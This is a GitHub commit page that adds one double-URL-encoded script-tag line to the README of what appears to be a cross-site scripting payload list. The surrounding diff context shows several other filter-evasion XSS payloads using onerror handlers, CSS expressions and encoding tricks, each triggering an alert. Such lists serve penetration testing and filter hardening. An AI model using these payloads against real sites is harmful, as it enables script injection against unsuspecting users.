Skip to content

Commit

Permalink
added double encoded payload
Browse files Browse the repository at this point in the history
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E most modern css payload
  • Loading branch information
3x1l3l4bs authored Oct 1, 2020
1 parent 20d9c39 commit 3a9e9b2
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -143,6 +143,7 @@ An attacker can use XSS to send a malicious script to an unsuspecting user. The
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
Expand Down

0 comments on commit 3a9e9b2

Please sign in to comment.